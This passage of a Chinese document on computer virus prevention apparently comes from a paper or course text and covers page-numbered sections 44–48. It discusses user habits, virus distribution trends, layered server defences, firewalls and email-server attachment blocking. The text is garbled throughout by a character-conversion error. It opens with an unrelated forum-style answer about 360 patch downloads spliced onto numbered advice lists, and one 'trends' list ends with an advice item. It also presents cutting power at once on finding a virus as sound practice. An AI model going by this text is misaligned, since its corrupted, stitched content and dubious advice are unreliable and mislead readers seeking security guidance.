44、360下載的補丁最多只是存在判斷不正確的問題，就是說出現(xiàn)實際無需安裝的補丁的下載提示，一般安裝補丁是以Windows Update上的提示為準(zhǔn)，而況你是正版的，更加無需擔(dān)心正版驗證的問題。絕大多數(shù)時候就算安裝了多余的補丁，也不會引起系統(tǒng)崩潰，你這崩潰和補丁可能存在關(guān)系，但也可能實際上是無關(guān)的，你在重啟之后WIN7自動進(jìn)行了修復(fù)，也就自然恢復(fù)正常了。（6）接收電子郵件、從網(wǎng)絡(luò)下載各種免費和共享軟件要進(jìn)行必要的檢查和殺毒后才能打開、安裝和使用。（7）提高自身素質(zhì)，上網(wǎng)瀏覽時不要訪問不良網(wǎng)站。當(dāng)前，網(wǎng)絡(luò)病毒的最新趨勢是： (1)不法分子或好事之徒制作的匿名網(wǎng)頁直接提供了下載大批病毒活樣本的便利途徑。

45、（2）由于學(xué)術(shù)研究的病毒樣本提供機構(gòu)同樣可以成為別有用心的人的使用工具。（3）由于網(wǎng)絡(luò)匿名登錄才成為可能的專門關(guān)于病毒制作研究討論的學(xué)術(shù)性質(zhì)的電子論文、期刊、雜志及相關(guān)的網(wǎng)上學(xué)術(shù)交流活動，如病毒制造協(xié)會年會等等，都有可能成為國內(nèi)外任何想成為新的病毒制造者學(xué)習(xí)、借鑒、盜用、抄襲的目標(biāo)與對象。（4）散見于網(wǎng)站上大批病毒制作工具、向?qū)?、程序等等，使得無編程經(jīng)驗和基礎(chǔ)的人制造新病毒成為可能。（5）新技術(shù)、新病毒使得幾乎所有人在不知情時無意中成為病毒擴散的載體或傳播者。其傳播方式和速度之快，讓人防不勝防，由此可見反病毒過程任重道遠(yuǎn)。(6)發(fā)現(xiàn)病毒后要立刻關(guān)機, 因為正常關(guān)機操作,Windows會做備份注

46、冊表等很多寫盤操作, 剛剛被病毒誤刪的文件可能被覆蓋,一旦被覆蓋就沒有修復(fù)的可能,即把電源切掉,操作系統(tǒng)自身的完整性和其他應(yīng)用程序還可能大部分保存完好, 然后用計算機恢復(fù)工具或殺毒軟件來處理。5.2基于服務(wù)器端的防范措施網(wǎng)絡(luò)服務(wù)器是計算機網(wǎng)絡(luò)的中心,是網(wǎng)絡(luò)的支柱。目前基于服務(wù)器的防治病毒方法大部分采用防治病毒可裝載模塊(NLM), 以提供實時掃描病毒的能力。有時也結(jié)合利用在服務(wù)器上的插防毒卡等技術(shù),保護(hù)服務(wù)器不受病毒的攻擊。具體措施有: （1）建立有效的計算機病毒防護(hù)體系。有效的計算機病毒防護(hù)體系應(yīng)包括多個防護(hù)層。一是訪問控制層；二是病毒檢測層；三是病毒遏制層；四是病毒清除層；五是系統(tǒng)恢復(fù)層；

47、六是應(yīng)急計劃層。上述六層計算機防護(hù)體系，須有有效的硬件和軟件技術(shù)的支持，如防火墻技術(shù)、網(wǎng)絡(luò)安全設(shè)計、身份驗證技術(shù)等。入侵檢測作為一種積極的安全防護(hù)技術(shù)，提供了對內(nèi)部攻擊，外部攻擊和錯誤操作的實時保護(hù)，在網(wǎng)絡(luò)系統(tǒng)收到危害前攔截和響應(yīng)入侵。從網(wǎng)絡(luò)安全建立縱身，多層次防御的角度出發(fā)。（2）安裝和設(shè)置防火墻。防火墻是指設(shè)置在不同網(wǎng)絡(luò)或網(wǎng)絡(luò)安全域之間的一系列部件的組合。 它可通過監(jiān)測、限制、更改跨越防火墻的數(shù)據(jù)流，盡可能地對外部屏蔽網(wǎng)絡(luò)內(nèi)部的信息、結(jié)構(gòu)和運行狀況， 以此來實現(xiàn)網(wǎng)絡(luò)的安全保護(hù)。 在邏輯上，防火墻是一個分離器，一個限制器，也是一個分析器，有效地監(jiān)控了內(nèi)部網(wǎng)和Internet之間的任何活動，

48、保證了內(nèi)部網(wǎng)絡(luò)的安全。在服務(wù)器端和客戶端都要安裝使用病毒防火墻, 建立立體的病毒防護(hù)體系, 一旦遭受病毒攻擊, 立即采取隔離措施。（ 3）安裝服務(wù)器端防病毒系統(tǒng),以提供對病毒的檢測、清除、免疫和對抗能力,同時及時對病毒庫進(jìn)行在線升級。有些人以為只要他們保護(hù)了自己的電子郵件網(wǎng)關(guān)和內(nèi)部的桌面計算機，就無需基于電子郵件服務(wù)器的防病毒解決方案了。這在幾年前或許是對的，但是目前隨著基于 Web 的電子郵件訪問、公共文件夾以及訪問存儲器的映射網(wǎng)絡(luò)驅(qū)動器等方式的出現(xiàn)，病毒可以通過多種方式進(jìn)入電子郵件服務(wù)器。這時，就只有基于電子郵件服務(wù)器的解決方案才能夠檢測和刪除受感染項。 攔截受感染的附件。許多利用電子郵件傳輸方式的病毒傳播者（又稱“海量寄件者”）經(jīng)常利用可在大多數(shù)計算機中找到的可執(zhí)行文件，如EXE、VBS和SHS散布病毒。實際上，大多數(shù)電子郵件用戶并不需要接收帶這類文件擴展的附件，因此當(dāng)它們進(jìn)入電子郵件服務(wù)器或網(wǎng)關(guān)時可以將其攔截下來。 安排全面隨機掃描。即使能夠保證使用所有最新的手段防范病毒，新型病毒也總是防不勝防。它們有可能乘人們還沒來得及正確識別，防病毒產(chǎn)品廠商也尚未相應(yīng)地制定出新的定義文件之前，進(jìn)入系統(tǒng)。通過使用最新定義文件，對所有數(shù)據(jù)進(jìn)行全面、隨機地掃描，確保